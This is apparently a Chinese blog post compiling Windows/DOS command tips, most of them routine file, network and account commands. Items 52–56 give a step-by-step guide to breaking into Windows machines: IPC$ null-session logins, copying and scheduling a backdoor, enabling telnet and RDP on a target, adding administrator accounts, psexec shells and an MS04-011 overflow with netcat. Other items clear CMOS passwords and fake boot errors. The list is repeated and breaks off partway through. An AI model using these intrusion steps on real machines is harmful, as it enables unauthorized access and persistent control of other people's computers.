dos命令

天大地大妈咪最大 提交于 2020-02-10 03:03:56
 

1.前提是有对方权限,百度可以搜索shutdown关闭远程计算机要求,以下不加:/m IP 即为关本机
   (1).在60秒后强制关机并有提示:shutdown /s /f /m IP /t 60 /c 计算机将在60秒后关机,取消关机请在开始菜单的'运行'中输入"shutdown -a"

   (2).在20秒后关闭指定IP的计算机:shutdown /s /t 20 /m IP

   (3).在10秒钟后重启指定IP的计算机:shutdown -r /t 10 /m IP

   (4).强制关闭指定IP的计算机:shutdown /s /t 10 /f /m IP
   (5).强制重启指定IP的计算机:shutdown /r /t 10 /f /m IP

   (6).取消指定IP的关机或重启:shutdown -a /m IP 

2.查看当前访问过我计算机的IP(会话):net session

3.合并两个二进制文件:copy/b 1.mp3+2.mp3 3.mp3  //即将两个mp3文件合成3.mp3 一个文件

4.从计算机中找合适的工具打开指定的文件:start 3.mp3
   start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令  例: start E:\yz.exe

5.清除系统密码:条件:MS-DOS窗口 (没试过)
   c:\>debug      输入debug回车
   -o 70 10       输入o空格70空格10回车
   -o 71 10       输入o空格71空格10回车
   -q             输入q退出debug
  原理是:利用o语句输入端口把垃圾字节10H覆盖原有CMOS数据,致使CMOS读取错误而自动重置成没有密码的初始状态,而达到破解目的。
6.巧设开机密码:(没试过)
    (1)用记事本打开或edit新建Autoexec.bat,输入以下内容:
         @echo off
         echo non-system disk or disk error
         choice /c:#/n
         使用:开机时显示non-system disk or disk error,造成“死机”的假象,别人看了会吓一跳,如果是你自己开的机,可

         以从容地输入# (相当于开机密码,也可以换成其它字符),即可让电脑继续运行直至进入桌面。
    (2)屏幕花屏:
        打开记事本新建C:\Windows\Winstart.bat,输入以下内容:
        @echo off
        abc echo _       _是英文下划线,为了节省篇幅,这里只输入1个,在实际中请输入80个_才能达到效果
        goto abc
     使用:当别人打开你的电脑时会以为显示器坏了或有病毒了,以达到吓退非法来客的目的,如果是你开机,暂时中止的方法:Ctrl+Break组合键,再按Y
            键。彻底解除的方法:开机按F8进入DOS,把C:\Windows\Winstart.bat文件删除即可恢复。

7.at命令的用法:at \\192.168.12.121 10:55 net start Application
   at \\192.168.12.121 10:55可直接查看用对方任务计划是否已经执行

8.如果at命令在命令提示符下运行,提示"服务尚未启动" ,在服务里找到Task Scheduler启动,可解决此问题

9.mstsc ----------远程桌面连接,在开始菜单----->运行---->输入mstsc即可出现远程连接的窗口

10.logoff  ---------注销系统命令

11.tsshutdn-------60秒倒计时关机命令,在‘运行’直接输入即可,取消,在‘运行’输入shutdown -a

12.arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址,ping一台计算机后,如果他开有防火墙,也好像可以通
    过此命令查出他的IP地址。  arp -a将显示出全部信息    

13.fc one.txt two.txt > 3st.txt    对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

14.nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名) 注意:参数-A要大写

15.net send ip "文本信息" 向对方发信息 前提条件是:控制面板中的‘服务’中的Message服务有开启 ip前没有\\

16.net view 查看本地局域网内开启了哪些共享 
     net view \\ip  查看对方局域网内开启了哪些共享

17.net time \\目标ip            查看对方时间 
    net time \\目标ip /set      设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 

18.unformat                  恢复已被格式化的磁盘 (没试过)
    unformat [盘符]          恢复指定的被格式化的磁盘 
    format 盘符: /Q /X           格式化指定的磁盘

19.net config 显示系统网络设置

20.查看本机IP地址:开始菜单,运行,输入cmd,进入dos后,输入ipconfig即可查看

21.echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 ,显示提示信息的时候用
    echo 信息                             在屏幕上显示出信息  
    echo 信息 >> pass.txt           将"信息"保存到pass.txt文件中

22.findstr "Hello" aa.txt       在aa.txt文件中寻找字符串hello  例:findstr "Hello" E:\aa.txt

23.type [文件名]      显示文本文件的内容  例:type D:\Others\a.txt  (a.txt  文件的内容)

24.(1)查看所有dos命令             cmd ---->键入help 
     (2)查看单独命令用法            cmd ---->命令名称 /? 例:at /?   
25.nbtstat -s -a IP       查看与本地机相连的电脑的信息(知道IP获取对方计算机名)

26.C:\WINDOWS\system32\config\SAM       存放系统密码

27.ren 原文件名 新文件名                            重命名文件名 

28.finger username @host 查看最近有哪些用户登陆本机

29. regedit ------注册表     regedt32------注册表编辑器 

30.copy 1.jpg/b+2.txt/a 3.jpg 将2.txt的内容藏身到生成的3.jpg文件中。可以打开用记事本打开3.jpg,在最后内容最后一行可以看到2.txt的内容。
     注:2.txt文件头要空三个空格,参数:/b指二进制文件,/a指ASCLL格式文件

31.局域网隐身法:
  在局域网中常通过网上邻居查看局域网中其他用户的在线情况,如果你不希望别的用户知道你是否在线,这时可以在win2000/xp下运行cmd 然后再运行
    net config server hidden:yes 回车后就隐身啦。如果要取消只要把yes 改成no

32.dir 查找文件       /a:查找隐藏文件          /s:在当前目录查找
     如:c:\>dir 123.exe /a /s 在c盘查找所有的123.exe文件,即使是隐藏文件,也可以找出来。

33.diskcopy 复制整张磁盘文件到另一个磁盘 (没试过)

34.del 删除文件:如:c:\>del D:\123.txt          c:\sysoft>del . 删除C盘sysoft目录下的所有文件

     del /s *.txt  静态删除后缀名为.txt的所有文件。
     rd  删除空目录

35. attrib 显示所有文件的属性 
     attrib +r或-r [文件名] 设置文件属性是否为只读
   attrib +h或-h [文件名] 设置文件属性是否隐含 
   attrib +s或-s [文件名] 设置文件属性是否为系统文件 
     attrib +a或-a [文件名] 设置文件属性是否为归档文件 
     attrib /s 设置包括子目录的文件在内的文件属性 
     例:C:\TEST>attrib +r wina20.386
     C:\>attrib +h *.* /s 隐含所有文件 
36.taskmgr--------任务管理器

37.conf-----------启动netmeeting ,相当于远程桌面

38.tasklist----------查找当前系统进程(包含pid)  
39.taskkill /参数 进程名或进程的pid   -------------  终止一个或多个任务和进程。
     参数说明:/pid 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动
     的子进程。  例:taskkill /pid 2330 /f

40.more 文件名 以一页一页的方式显示一个文本文件。 例:more D:\Others\dos\总结DOS.txt

41.mkdir 目录名 建立文件目录

42.rmdir 删除子目录,目录内没有文档。

43.tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 

44.net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限

     注意:administrator后加s用复数 

45.net user guest /active:yes   激活guest用户  
     net user guest /active:no    禁用guest

46.net user 用户名 新密码            即可修改为你需要的密码   
     net user 帐户名 密码 /add      为计算机添加一个用户

47.net share xxh=c:\          共享C盘       

     net share xxh /del         删除C盘共享

48.net start 服务              开启服务 net start mssqlserver
     net stop 服务              停止服务 net stop mssqlserver

49.net pause 服务名          暂停某服务

50.如何防范 ipc$ 入侵(没试过)
    (1)关闭 ipc$ 和默认共享依赖的服务 :server 服务
       如果你真的想关闭 ipc$ 共享,那就禁止 server 服务吧:控制面板 - 管理工具 - 服务 - 找到 server 服务(右击)- 属

       性 - 常规 - 启动类型 - 选已禁用,这时可能会有提示说: XXX 服务也会关闭是否继续,因为还有些次要的服务要依

       赖于 server 服务,不要管它。
    (2)屏蔽 139 , 445 端口
        由于没有以上两个端口的支持,是无法建立 ipc$的,因此屏蔽139,445端口同样可以阻止 ipc$入侵.139端口可以通过

        禁止 NBT 来屏蔽 本地连接- TCP/IP 属性-高级          -WINS -选‘禁用‘ 

51.复制指定的目录和目录下的所有文件连同目录结构:XCOPY [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E] 
      (1)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参

            数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;
      (2)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。

52.net user guest 12345     用guest用户登陆肉鸡后将guest密码改为12345

53.局域网中知道ip地址,如何获取对方计算机名?
    (1)可以查出用户名还可以看到他所在的工作组,就是: nbtstat -s -a IP   
    (2)右键我的电脑,管理,右键计算机管理,连接到另外一台计算机,输入ip,单击确定

54.知道对方计算机名如何知道对方IP?
     ping IP 里面包含计算机名  例如:ping 192.168.12.1

55.非xp系统的IPC$入侵(没试过)
    1. 建立 / 删除 ipc$ 连接的命令
        1 )建立空连接 :   net use \\127.0.0.1\ipc$ "" /user:""
        2 )建立非空连接 : net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
        3 )删除连接 :   net use \\127.0.0.1\ipc$ /del
    2.在 ipc$ 连接中对远程主机的操作命令 
       1 )查看远程主机的共享资源(看不到默认共享): net view \\127.0.0.1 
       2 )查看远程主机的当前时间 : net time \\127.0.0.1 
       3 )得到远程主机的 netbios 用户名列表 : nbtstat -A 127.0.0.1 
       4 )映射 / 删除远程共享 : 
            net use z: \\127.0.0.1\c            此命令将共享名为 c 的共享资源映射为本地 z 盘 
            net use z: /del                         删除映射的 z 盘,其他盘类推 
       5 )向远程主机复制文件 : 
            copy 路径 \ 文件名 \\IP\ 共享目录名,如: 
            copy c:\xinxin.exe \\127.0.0.1\c$   即将 c 盘下的 xinxin.exe 复制到对方 c 盘内,当然,你也可以把远程主机上的文件复制到自己的机器里: copy \\127.0.0.1\c$\xinxin.exe  c:\          
       6 )远程添加计划任务 : 
            at \\IP 时间 程序名 如: 
            at \\127.0.0.0 11:00 xinxin.exe 
       注意:时间尽量使用 24 小时制,如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
    3. 本地命令 
        1 )查看本地主机的共享资源(可以看到本地的默认共享) net share 
        2 )得到本地主机的用户列表   net user 
        3 )显示本地某用户的帐户信息  net user 帐户名
        4 )显示本地主机当前启动的服务  net start 
        5 )启动 / 关闭本地服务   net start 服务名          net stop 服务名
        6 )在本地添加帐户 net user 帐户名 密码 /add          
        7 )激活禁用的用户  net uesr 帐户名 /active:yes 
        8 )加入管理员组  net localgroup administrators 帐户名 /add         
              很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些

              命令,那么这些本地输入将作用在远程主机上。
        9 )从管理员组删除net localgroup administrators 帐户名 /del
     4. 其他一些命令
        1 )telnet : telnet IP 端口 
             telnet 127.0.0.0 23
        2 )用 opentelnet.exe 开启远程主机的 telnet 
              OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port 
              OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 
              不过这个小工具需要满足四个要求: 
              (1).目标开启了 ipc$ 共享 
              (2).你要拥有管理员密码和帐号 
              (3).目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证 
       3 )对仅 WIN2K/XP 有效 
       4 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持 (对方必须开启admin$)
             psexec.exe \\IP -u 管理员帐号 -p 密码 cmd 
             psexec.exe \\127.0.0.1 -u administrator -p "" cmd
       对比过去和现今的 ipc$ 入侵
       既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
         [1]  C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators        用扫到的空口令建立连接  
         [2]  C:\>net view \\127.0.0.1                   查看远程的共享资源
         [3]  C:\>copy srv.exe \\127.0.0.1\admin$\system32 
                将一次性后门 srv.exe 复制到对方的系统文件夹下,前提是 admin$ 开启                        

         [4]  C:\>net time \\127.0.0.1           查看远程主机的当前时间 
         [5]  C:\>at \\127.0.0.1 时间 srv.exe 
               用 at 命令远程运行 srv.exe ,需要对方开启了 'Task Scheduler' 服务  
         [6]  C:\>net time \\127.0.0.1 
               再次查看当前时间来估算 srv.exe 是否已经运行,此步可以省略
         [7]  C:\>telnet 127.0.0.1 99 
               开一个新窗口,用 telnet 远程登陆到127.0.0.1 从而获得一个 shell( 不懂 shell 是什么意思?那你就把它想象成

              远程机器的控制权就好了,操作像 DOS),99 端口是srv.exe 开的一次性后门的端口  
         [8]  C:\WINNT\system32>net start telnet 
              我们在刚刚登陆上的 shell 中启动远程机器的 telnet 服务,毕竟 srv.exe 是一次性的后门,我们需要一个长久的后

              门便于以后访问,如果对方的 telnet 已经启动,此步可省略
         [9]  C:\>copy ntlm.exe \\127.0.0.1\admin$\system32 
                在原来那个窗口中将 ntlm.exe 传过去, ntlm.exe 是用来更改 telnet 身份验证的  
         [10] C:\WINNT\system32>ntlm.exe 
                在 shell 窗口中运行 ntlm.exe ,以后你就可以畅通无阻的 telnet 这台主机了
         [11]  C:\>telnet 127.0.0.1 23 
                 在新窗口中 telnet 到 127.0.0.1 ,端口 23 可省略,这样我们又获得一个长期的后门
         [12]  C:\WINNT\system32>net user 帐户名 密码 /add
                 C:\WINNT\system32>net uesr guest /active:yes
                 C:\WINNT\system32>net localgroup administrators 帐户名 /add 
                  telnet 上以后,你可以建立新帐户,激活 guest ,把任何帐户加入管理员组等 

        好了,写到这里我似乎回到了 2 , 3 年前,那时的 ipc$ 大家都是这么用的,不过随着新工具的出现,上面提到的一些工具和命令现在已经不常用到了,那就让我们看看现在的高效而简单的 ipc$ 入侵吧。 
        [13]  psexec.exe \\IP -u 管理员帐号 -p 密码 cmd    \\ 用这个工具我们可以一步到位的获得 shell 
                OpenTelnet.exe \\server 管理员帐号 密码 NTLM 的认证方式 port   \\ 用它可以方便的更改 telnet 的验证方式和

                端口,方便我们登陆

56.xp系统入侵
    1.开启远程桌面(3389端口)
       将下面三行复制到记事本,该后缀名为3389.reg  双击即可打开3389端口(远程桌面连接功能) 
       Windows Registry Editor Version 5.00

       [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
       "fDenyTSConnections"=dword:00000000
       将3389.reg复制到目标机上(复制要先得到目标的权限)
       在目标机上导入3389.reg 的dos命令:regedit /s c:\3389.reg  或 regedit /e c:\123.reg
       再在运行输入mstsc 在弹出的窗口中输入目标机的IP 即可连接到目标机的桌面

     2.xp 系统入侵
        [1].入侵一:
            入侵对方电脑前提:
            (1).控制面板------>服务----->本地安全策略------>安全选项-->"网络访问:本地账户的共享和安全模式 "为"经典-本地用户以自己的身份验证"
                可通过修改注册表改为"经典-本地用户以自己的身份验证":
                 Windows Registry Editor Version 5.00

                 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
                 "forceguest"=dword:00000000

            (2).控制面板------>服务----->本地安全策略------>安全选项-->"账户:来宾用户状态" 为已启用
                 net user guest /active:yes 可开启

            (3).有对方用户名和密码  
            入侵步骤:
            (1).开始菜单----->运行----->cmd-->键入net use \\192.168.0.1\ipc$ " 密码 " /user:" 用户名 "  
                 例: net use \\192.168.0.1\ipc$ "" /user:"administrator"

            (2).我的电脑---->管理---->操作--->连接到另一台计算机---->输入对方计算机名或IP
                 当连接上了以后----->点击左边的"服务和应用程序",服务---->开启 telnet 服务

            (3).开始菜单----->运行----->cmd-->telnet 192.168.0.1 即可获得对方shell        
       [2].入侵二:使用xp溢出(没成功过)
            在网上下载一个xp.exe 或 ms04011 
            (1).xp溢出使用方法: xp <Target ID> <Target IP> 例:D:\xp.exe 15 192.168.0.1 溢出成功即可获得对方shell
            (2).ms04011 使用
                 D:\>ms04011 1 192.168.8.222 1122
                        shellcode size 404
                        Ret value = 1727
                 再开一个shell
                 D:\>nc 192.168.8.222 1122

                      如果出现引号内容
                      "Microsoft Windows XP [版本 5.1.2600]
                      (C) 版权所有 1985-2001 Microsoft Corp. "
                 则表示溢出成功,获得对方shell,这样即可在对方机上执行任何命令

       [3].借助 psexec.exe 工具
             前提:对方有共享admin$;net share admin$ 即可共享admin$,删除 net share admin$ /del
             psexec.exe \\IP -u 管理员帐号 -p 密码 cmd    \\ 用这个工具我们可以一步到位的获得 shell 
             例:D:\psexec.exe \\192.168.0.1 -u administrator -p "" cmd
57.系统防护:(好像不行)
     控制面板—>管理工具—>本地安全策略”,展开“本地策略”—“用户权利指派”。

     在右边有一个“拒绝从网络访问这台计算机”-->添加用户和组, 添加Guest用户即可让别人不能从网络访问本机     
58.禁用的at服务dos命令开启?
     先运行“sc config Schedule start= DEMAND”,再运行一遍“net start schedule”

59.注册表解禁
     1).在Windows 2000/XP/2003中,我们可以通过单击“开始→运行”,输入“Gpedit.msc”后回车,打开“组策略”。
         然后依次展开“用户配置→管理模板→系统”,双击右侧窗口中的“阻止访问注册表编辑工具”,在弹出的窗口中选择“已禁用”,“确定”后再退出“组策略”,即可为注册表解锁.  
     2).用记事本编辑一个任意名字的.reg文件,比如注册表qifan.reg,内容如下:
        REGEDIT4

        [HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System]
        " DisableRegistryTools "=dword:00000000

        存盘。然后双击它就好

60.运行隐藏
    1:打开组策略编辑器(可以在任务管理器的文件菜单下面点新建任务,输入gpedit.msc打开,也可以直接在系统盘的windows\system32目录下面找到
       gpedit.msc这个文件打开)展开左边最下面一个管理模板,点任务栏和开始菜单,确认“从开始菜单中删除‘运行’菜单”没有被启用(要是被启用,
       就双击打开它的属性,设置成未被配置或已禁用,最好是已禁用,这样别的一些优化软件如果禁用了运行,这这里都可以显示了。)

    2:如果上面设置后还是没有的话,就用这个方法。 
       在任务栏点右键,打开“任务栏和开始菜单属性”点击开始菜单,下面有两个选项,如果你是XP默认的开始菜单,则点击开始菜单后面的“自定义”点
      “高级”,在开始菜        单项目里面最后一个选项“运行命令”前打上勾,这样运行就出现了。如果你是经典开始菜单就选择它后面的“自定义”在开
       始菜单选项里面把“显示运行”勾上,然后应用就可以了。当然你先设置“2”再设置“1”也是可的  

    3:将以下内容复制到写字板中然后存为1.reg双击打开1.reg文件就可恢复了。
       [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explore r]    "NoRun"=dword:00000000 

61.让文件不能删除 ren name E:\123.txt " ./"      删除用文件暴力删除器或360粉碎机

62.runas /profile /user:administrator cmd.exe  查看 administrator 用户的权限   

63.Telnet 你可以更改为一个其他的端口(默认23),  这样别人可能就不知道是不是开了telnet服务了。这个项也我 们 利 用Telnet服务器更自由了。在
    Telnet服务器配置这些参数中,可以使用tlntadmn.exe命令来进行非常方便的配置,配置后需要重新启动Telnet  服务。  
64.记事本打开指定位置文件:notepad C:\1.txt  可直接再运行窗口执行

1.前提是有对方权限,百度可以搜索shutdown关闭远程计算机要求,以下不加:/m IP 即为关本机
   (1).在60秒后强制关机并有提示:shutdown /s /f /m IP /t 60 /c 计算机将在60秒后关机,取消关机请在开始菜单的'运行'中输入"shutdown -a"

   (2).在20秒后关闭指定IP的计算机:shutdown /s /t 20 /m IP

   (3).在10秒钟后重启指定IP的计算机:shutdown -r /t 10 /m IP

   (4).强制关闭指定IP的计算机:shutdown /s /t 10 /f /m IP
   (5).强制重启指定IP的计算机:shutdown /r /t 10 /f /m IP

   (6).取消指定IP的关机或重启:shutdown -a /m IP 

2.查看当前访问过我计算机的IP(会话):net session

3.合并两个二进制文件:copy/b 1.mp3+2.mp3 3.mp3  //即将两个mp3文件合成3.mp3 一个文件

4.从计算机中找合适的工具打开指定的文件:start 3.mp3
   start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令  例: start E:\yz.exe

5.清除系统密码:条件:MS-DOS窗口 (没试过)
   c:\>debug      输入debug回车
   -o 70 10       输入o空格70空格10回车
   -o 71 10       输入o空格71空格10回车
   -q             输入q退出debug
  原理是:利用o语句输入端口把垃圾字节10H覆盖原有CMOS数据,致使CMOS读取错误而自动重置成没有密码的初始状态,而达到破解目的。
6.巧设开机密码:(没试过)
    (1)用记事本打开或edit新建Autoexec.bat,输入以下内容:
         @echo off
         echo non-system disk or disk error
         choice /c:#/n
         使用:开机时显示non-system disk or disk error,造成“死机”的假象,别人看了会吓一跳,如果是你自己开的机,可

         以从容地输入# (相当于开机密码,也可以换成其它字符),即可让电脑继续运行直至进入桌面。
    (2)屏幕花屏:
        打开记事本新建C:\Windows\Winstart.bat,输入以下内容:
        @echo off
        abc echo _       _是英文下划线,为了节省篇幅,这里只输入1个,在实际中请输入80个_才能达到效果
        goto abc
     使用:当别人打开你的电脑时会以为显示器坏了或有病毒了,以达到吓退非法来客的目的,如果是你开机,暂时中止的方法:Ctrl+Break组合键,再按Y
            键。彻底解除的方法:开机按F8进入DOS,把C:\Windows\Winstart.bat文件删除即可恢复。

7.at命令的用法:at \\192.168.12.121 10:55 net start Application
   at \\192.168.12.121 10:55可直接查看用对方任务计划是否已经执行

8.如果at命令在命令提示符下运行,提示"服务尚未启动" ,在服务里找到Task Scheduler启动,可解决此问题

9.mstsc ----------远程桌面连接,在开始菜单----->运行---->输入mstsc即可出现远程连接的窗口

10.logoff  ---------注销系统命令

11.tsshutdn-------60秒倒计时关机命令,在‘运行’直接输入即可,取消,在‘运行’输入shutdown -a

12.arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址,ping一台计算机后,如果他开有防火墙,也好像可以通
    过此命令查出他的IP地址。  arp -a将显示出全部信息    

13.fc one.txt two.txt > 3st.txt    对比二个文件并把不同之处输出到3st.txt文件中,"> "和"> >" 是重定向命令

14.nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名) 注意:参数-A要大写

15.net send ip "文本信息" 向对方发信息 前提条件是:控制面板中的‘服务’中的Message服务有开启 ip前没有\\

16.net view 查看本地局域网内开启了哪些共享 
     net view \\ip  查看对方局域网内开启了哪些共享

17.net time \\目标ip            查看对方时间 
    net time \\目标ip /set      设置本地计算机时间与"目标IP"主机的时间同步,加上参数/yes可取消确认信息 

18.unformat                  恢复已被格式化的磁盘 (没试过)
    unformat [盘符]          恢复指定的被格式化的磁盘 
    format 盘符: /Q /X           格式化指定的磁盘

19.net config 显示系统网络设置

20.查看本机IP地址:开始菜单,运行,输入cmd,进入dos后,输入ipconfig即可查看

21.echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置 ,显示提示信息的时候用
    echo 信息                             在屏幕上显示出信息  
    echo 信息 >> pass.txt           将"信息"保存到pass.txt文件中

22.findstr "Hello" aa.txt       在aa.txt文件中寻找字符串hello  例:findstr "Hello" E:\aa.txt

23.type [文件名]      显示文本文件的内容  例:type D:\Others\a.txt  (a.txt  文件的内容)

24.(1)查看所有dos命令             cmd ---->键入help 
     (2)查看单独命令用法            cmd ---->命令名称 /? 例:at /?   
25.nbtstat -s -a IP       查看与本地机相连的电脑的信息(知道IP获取对方计算机名)

26.C:\WINDOWS\system32\config\SAM       存放系统密码

27.ren 原文件名 新文件名                            重命名文件名 

28.finger username @host 查看最近有哪些用户登陆本机

29. regedit ------注册表     regedt32------注册表编辑器 

30.copy 1.jpg/b+2.txt/a 3.jpg 将2.txt的内容藏身到生成的3.jpg文件中。可以打开用记事本打开3.jpg,在最后内容最后一行可以看到2.txt的内容。
     注:2.txt文件头要空三个空格,参数:/b指二进制文件,/a指ASCLL格式文件

31.局域网隐身法:
  在局域网中常通过网上邻居查看局域网中其他用户的在线情况,如果你不希望别的用户知道你是否在线,这时可以在win2000/xp下运行cmd 然后再运行
    net config server hidden:yes 回车后就隐身啦。如果要取消只要把yes 改成no

32.dir 查找文件       /a:查找隐藏文件          /s:在当前目录查找
     如:c:\>dir 123.exe /a /s 在c盘查找所有的123.exe文件,即使是隐藏文件,也可以找出来。

33.diskcopy 复制整张磁盘文件到另一个磁盘 (没试过)

34.del 删除文件:如:c:\>del D:\123.txt          c:\sysoft>del . 删除C盘sysoft目录下的所有文件

     del /s *.txt  静态删除后缀名为.txt的所有文件。
     rd  删除空目录

35. attrib 显示所有文件的属性 
     attrib +r或-r [文件名] 设置文件属性是否为只读
   attrib +h或-h [文件名] 设置文件属性是否隐含 
   attrib +s或-s [文件名] 设置文件属性是否为系统文件 
     attrib +a或-a [文件名] 设置文件属性是否为归档文件 
     attrib /s 设置包括子目录的文件在内的文件属性 
     例:C:\TEST>attrib +r wina20.386
     C:\>attrib +h *.* /s 隐含所有文件 
36.taskmgr--------任务管理器

37.conf-----------启动netmeeting ,相当于远程桌面

38.tasklist----------查找当前系统进程(包含pid)  
39.taskkill /参数 进程名或进程的pid   -------------  终止一个或多个任务和进程。
     参数说明:/pid 要终止进程的pid,可用tasklist命令获得各进程的pid,/IM 要终止的进程的进程名,/F 强制终止进程,/T 终止指定的进程及他所启动
     的子进程。  例:taskkill /pid 2330 /f

40.more 文件名 以一页一页的方式显示一个文本文件。 例:more D:\Others\dos\总结DOS.txt

41.mkdir 目录名 建立文件目录

42.rmdir 删除子目录,目录内没有文档。

43.tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称 

44.net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限

     注意:administrator后加s用复数 

45.net user guest /active:yes   激活guest用户  
     net user guest /active:no    禁用guest

46.net user 用户名 新密码            即可修改为你需要的密码   
     net user 帐户名 密码 /add      为计算机添加一个用户

47.net share xxh=c:\          共享C盘       

     net share xxh /del         删除C盘共享

48.net start 服务              开启服务 net start mssqlserver
     net stop 服务              停止服务 net stop mssqlserver

49.net pause 服务名          暂停某服务

50.如何防范 ipc$ 入侵(没试过)
    (1)关闭 ipc$ 和默认共享依赖的服务 :server 服务
       如果你真的想关闭 ipc$ 共享,那就禁止 server 服务吧:控制面板 - 管理工具 - 服务 - 找到 server 服务(右击)- 属

       性 - 常规 - 启动类型 - 选已禁用,这时可能会有提示说: XXX 服务也会关闭是否继续,因为还有些次要的服务要依

       赖于 server 服务,不要管它。
    (2)屏蔽 139 , 445 端口
        由于没有以上两个端口的支持,是无法建立 ipc$的,因此屏蔽139,445端口同样可以阻止 ipc$入侵.139端口可以通过

        禁止 NBT 来屏蔽 本地连接- TCP/IP 属性-高级          -WINS -选‘禁用‘ 

51.复制指定的目录和目录下的所有文件连同目录结构:XCOPY [源盘:]〈源路径名〉[目标盘符:][目标路径名][/S][/V][/E] 
      (1)选用/S时对源目录下及其子目录下的所有文件进行COPY。除非指定/E参数,否则/S不会拷贝空目录,若不指定/S参

            数,则XCOPY只拷贝源目录本身的文件,而不涉及其下的子目录;
      (2)选用/V参数时,对的拷贝的扇区都进行较验,但速度会降低。

52.net user guest 12345     用guest用户登陆肉鸡后将guest密码改为12345

53.局域网中知道ip地址,如何获取对方计算机名?
    (1)可以查出用户名还可以看到他所在的工作组,就是: nbtstat -s -a IP   
    (2)右键我的电脑,管理,右键计算机管理,连接到另外一台计算机,输入ip,单击确定

54.知道对方计算机名如何知道对方IP?
     ping IP 里面包含计算机名  例如:ping 192.168.12.1

55.非xp系统的IPC$入侵(没试过)
    1. 建立 / 删除 ipc$ 连接的命令
        1 )建立空连接 :   net use \\127.0.0.1\ipc$ "" /user:""
        2 )建立非空连接 : net use \\127.0.0.1\ipc$ " 密码 " /user:" 用户名 "
        3 )删除连接 :   net use \\127.0.0.1\ipc$ /del
    2.在 ipc$ 连接中对远程主机的操作命令 
       1 )查看远程主机的共享资源(看不到默认共享): net view \\127.0.0.1 
       2 )查看远程主机的当前时间 : net time \\127.0.0.1 
       3 )得到远程主机的 netbios 用户名列表 : nbtstat -A 127.0.0.1 
       4 )映射 / 删除远程共享 : 
            net use z: \\127.0.0.1\c            此命令将共享名为 c 的共享资源映射为本地 z 盘 
            net use z: /del                         删除映射的 z 盘,其他盘类推 
       5 )向远程主机复制文件 : 
            copy 路径 \ 文件名 \\IP\ 共享目录名,如: 
            copy c:\xinxin.exe \\127.0.0.1\c$   即将 c 盘下的 xinxin.exe 复制到对方 c 盘内,当然,你也可以把远程主机上的文件复制到自己的机器里: copy \\127.0.0.1\c$\xinxin.exe  c:\          
       6 )远程添加计划任务 : 
            at \\IP 时间 程序名 如: 
            at \\127.0.0.0 11:00 xinxin.exe 
       注意:时间尽量使用 24 小时制,如果你打算运行的程序在系统默认搜索路径(比如 system32/ )下则不用加路径,否则必须加全路径
    3. 本地命令 
        1 )查看本地主机的共享资源(可以看到本地的默认共享) net share 
        2 )得到本地主机的用户列表   net user 
        3 )显示本地某用户的帐户信息  net user 帐户名
        4 )显示本地主机当前启动的服务  net start 
        5 )启动 / 关闭本地服务   net start 服务名          net stop 服务名
        6 )在本地添加帐户 net user 帐户名 密码 /add          
        7 )激活禁用的用户  net uesr 帐户名 /active:yes 
        8 )加入管理员组  net localgroup administrators 帐户名 /add         
              很显然的是,虽然这些都是本地命令,但如果你在远程主机的 shell 中输入,比如你 telnet 成功后输入上面这些

              命令,那么这些本地输入将作用在远程主机上。
        9 )从管理员组删除net localgroup administrators 帐户名 /del
     4. 其他一些命令
        1 )telnet : telnet IP 端口 
             telnet 127.0.0.0 23
        2 )用 opentelnet.exe 开启远程主机的 telnet 
              OpenTelnet.exe \\ip 管理员帐号 密码 NTLM 的认证方式 port 
              OpenTelnet.exe \\127.0.0.1 administrator "" 1 90 
              不过这个小工具需要满足四个要求: 
              (1).目标开启了 ipc$ 共享 
              (2).你要拥有管理员密码和帐号 
              (3).目标开启 RemoteRegistry 服务,用户就可以更改 ntlm 认证 
       3 )对仅 WIN2K/XP 有效 
       4 )用 psexec.exe 一步获得 shell ,需要 ipc 管道支持 (对方必须开启admin$)
             psexec.exe \\IP -u 管理员帐号 -p 密码 cmd 
             psexec.exe \\127.0.0.1 -u administrator -p "" cmd
       对比过去和现今的 ipc$ 入侵
       既然是对比,那么我就先把过去的 ipc$ 入侵步骤写给大家,都是蛮经典的步骤:
         [1]  C:\>net use \\127.0.0.1\ipc$ "" /user:admintitrators        用扫到的空口令建立连接  
         [2]  C:\>net view \\127.0.0.1                   查看远程的共享资源
